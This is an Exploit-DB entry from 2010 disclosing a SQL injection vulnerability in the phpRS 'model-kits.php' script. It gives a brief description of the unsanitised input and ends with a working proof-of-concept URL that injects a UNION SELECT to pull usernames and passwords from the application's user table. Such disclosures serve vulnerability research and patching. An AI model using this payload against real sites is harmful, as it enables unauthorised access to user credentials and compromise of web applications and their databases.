phpRS 'model-kits.php' SQL Injection Vulnerability

2010-12-16T00:00:00
ID EDB-ID:35118
Type exploitdb
Reporter KnocKout
Modified 2010-12-16T00:00:00

Description

phpRS 'model-kits.php' SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/45467/info

phpRS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

http://www.example.com/model-kits.php?akce=model&nazev=zis-3-1942-divisional-gun&id=-32/**/union/**/select/**/1,concat%28user,0x3a,password%29,3,4,5/**/from/**/mac_user--